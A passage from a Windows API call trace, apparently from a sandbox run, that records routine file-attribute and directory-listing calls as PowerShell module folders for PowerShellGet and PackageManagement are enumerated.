lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), fInfoLevelId=0x0, lpFileInformation=0x29933dc | out: lpFileInformation=0x29933dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49aae0a0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x3ea79a40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x3ea79a40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x10de)) returned 1 [0149.907] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d508) returned 1 [0149.907] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.psd1")) returned 0xffffffff [0149.907] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.psm1")) returned 0xffffffff [0149.907] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.cdxml")) returned 0xffffffff [0149.907] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.xaml")) returned 0xffffffff [0149.907] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.ni.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.ni.dll")) returned 0xffffffff [0149.907] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.dll")) returned 0xffffffff [0149.911] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\keecfmwgj\\documents\\windowspowershell\\modules")) returned 0xffffffff [0149.923] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules" (normalized: "c:\\program files (x86)\\windowspowershell\\modules")) returned 0x10 [0149.924] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d794) returned 1 [0149.924] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x31 [0149.924] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules", nBufferLength=0x31, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x30 [0149.925] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\*" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\*"), lpFindFileData=0x5a0d544 | out: lpFindFileData=0x5a0d544*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x499a3700, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x499ef9c0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x499ef9c0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68e9e0 [0149.925] FindNextFileW (in: hFindFile=0x68e9e0, lpFindFileData=0x5a0d54c | out: lpFindFileData=0x5a0d54c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x499a3700, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x499ef9c0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x499ef9c0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0149.925] FindNextFileW (in: hFindFile=0x68e9e0, lpFindFileData=0x5a0d54c | out: lpFindFileData=0x5a0d54c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x499ef9c0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x499ef9c0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x499ef9c0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement", cAlternateFileName="PACKAG~1")) returned 1 [0149.925] FindNextFileW (in: hFindFile=0x68e9e0, lpFindFileData=0x5a0d54c | out: lpFindFileData=0x5a0d54c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x499a3700, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x499a3700, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x499a3700, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShellGet", cAlternateFileName="POWERS~1")) returned 1 [0149.925] FindNextFileW (in: hFindFile=0x68e9e0, lpFindFileData=0x5a0d54c | out: lpFindFileData=0x5a0d54c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0149.925] FindClose (in: hFindFile=0x68e9e0 | out: hFindFile=0x68e9e0) returned 1 [0149.925] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d504) returned 1 [0149.925] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d764) returned 1 [0149.925] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Modules.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\modules.psd1")) returned 0xffffffff [0149.926] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Modules.psm1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\modules.psm1")) returned 0xffffffff [0149.926] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Modules.cdxml" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\modules.cdxml")) returned 0xffffffff [0149.926] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Modules.xaml" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\modules.xaml")) returned 0xffffffff [0149.926] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Modules.ni.dll" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\modules.ni.dll")) returned 0xffffffff [0149.926] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Modules.dll" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\modules.dll")) returned 0xffffffff [0149.926] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x43 [0149.927] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x43, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x42 [0149.927] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d4e4) returned 1 [0149.927] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\packagemanagement"), fInfoLevelId=0x0, lpFileInformation=0x5a0d7a8 | out: lpFileInformation=0x5a0d7a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x499ef9c0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x499ef9c0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x499ef9c0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0149.927] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d4e0) returned 1 [0149.927] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3f [0149.927] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x3f, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x3e [0149.927] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d4e4) returned 1 [0149.927] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget"), fInfoLevelId=0x0, lpFileInformation=0x5a0d7a8 | out: lpFileInformation=0x5a0d7a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x499a3700, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x499a3700, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x499a3700, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0149.927] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d4e0) returned 1 [0149.928] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d794) returned 1 [0149.928] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x43 [0149.928] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x43, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x42 [0149.928] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\*" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\packagemanagement\\*"), lpFindFileData=0x5a0d544 | out: lpFindFileData=0x5a0d544*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x499ef9c0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x499ef9c0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x499ef9c0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68e9e0 [0149.928] FindNextFileW (in: hFindFile=0x68e9e0, lpFindFileData=0x5a0d54c | out: lpFindFileData=0x5a0d54c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x499ef9c0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x499ef9c0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x499ef9c0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0149.928] FindNextFileW (in: hFindFile=0x68e9e0, lpFindFileData=0x5a0d54c | out: lpFindFileData=0x5a0d54c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x499ef9c0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x49a61de0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x49a61de0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0149.928] FindNextFileW (in: hFindFile=0x68e9e0, lpFindFileData=0x5a0d54c | out: lpFindFileData=0x5a0d54c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0149.929] FindClose (in: hFindFile=0x68e9e0 | out: hFindFile=0x68e9e0) returned 1 [0149.929] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d504) returned 1 [0149.929] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d764) returned 1 [0149.929] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x62 [0149.929] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x62, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x61 [0149.929] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d4e8) returned 1 [0149.929] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), fInfoLevelId=0x0, lpFileInformation=0x5a0d7ac | out: lpFileInformation=0x5a0d7ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49a3bc80, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x3ea79a40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x3ea79a40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x8f9)) returned 1 [0149.929] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d4e4) returned 1 [0149.929] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x62 [0149.929] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x62, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x61 [0149.929] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x62 [0149.929] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x62, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x61 [0149.930] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d50c) returned 1 [0149.930] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), fInfoLevelId=0x0, lpFileInformation=0x299d1c0 | out: lpFileInformation=0x299d1c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49a3bc80, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x3ea79a40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x3ea79a40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x8f9)) returned 1 [0149.930] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d508) returned 1 [0149.930] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psd1")) returned 0xffffffff [0149.930] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psm1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psm1")) returned 0xffffffff [0149.930] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.cdxml" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\packagemanagement\\packagemanagement.cdxml")) returned 0xffffffff [0149.930] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.xaml" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\packagemanagement\\packagemanagement.xaml")) returned 0xffffffff [0149.930] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.ni.dll" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\packagemanagement\\packagemanagement.ni.dll")) returned 0xffffffff [0149.930] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.dll" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\packagemanagement\\packagemanagement.dll")) returned 0xffffffff [0149.931] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d794) returned 1 [0149.931] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3f [0149.931] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x3f, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x3e [0149.931] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\*" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\*"), lpFindFileData=0x5a0d544 | out: lpFindFileData=0x5a0d544*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x499a3700, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x499a3700, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x499a3700, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68e9e0 [0149.931] FindNextFileW (in: hFindFile=0x68e9e0, lpFindFileData=0x5a0d54c | out: lpFindFileData=0x5a0d54c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x499a3700, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x499a3700, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x499a3700, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0149.931] FindNextFileW (in: hFindFile=0x68e9e0, lpFindFileData=0x5a0d54c | out: lpFindFileData=0x5a0d54c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x499a3700, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x499ef9c0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x499ef9c0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0149.931] FindNextFileW (in: hFindFile=0x68e9e0, lpFindFileData=0x5a0d54c | out: lpFindFileData=0x5a0d54c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0149.932] FindClose (in: hFindFile=0x68e9e0 | out: hFindFile=0x68e9e0) returned 1 [0149.932] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d504) returned 1 [0149.932] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d764) returned 1 [0149.932] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5a [0149.932] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x5a, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x59 [0149.932] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d4e8) returned 1 [0149.932] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), fInfoLevelId=0x0, lpFileInformation=0x5a0d7ac | out: lpFileInformation=0x5a0d7ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x499a3700, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x3ea538e0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x3ea538e0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x10de)) returned 1 [0149.932] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d4e4) returned 1 [0149.932] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5a [0149.933] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x5a, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x59 [0149.933] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5a [0149.933] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x5a, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x59 [0149.933] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d50c) returned 1 [0149.933] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), fInfoLevelId=0x0, lpFileInformation=0x299e890 | out: lpFileInformation=0x299e890*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x499a3700, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x3ea538e0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x3ea538e0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x10de)) returned 1 [0149.933] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d508) returned 1 [0149.933] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\powershellget.psd1")) returned 0xffffffff [0149.933] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.psm1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\powershellget.psm1")) returned 0xffffffff [0149.933] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.cdxml" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\powershellget.cdxml")) returned 0xffffffff [0149.934] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.xaml" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\powershellget.xaml")) returned 0xffffffff [0149.934] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.ni.dll" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\powershellget.ni.dll")) returned 0xffffffff [0149.934] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.dll" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\powershellget.dll")) returned 0xffffffff [0149.938] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules")) returned 0x10 [0149.938] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d794) returned 1 [0149.939] GetFullPathNameW (in: 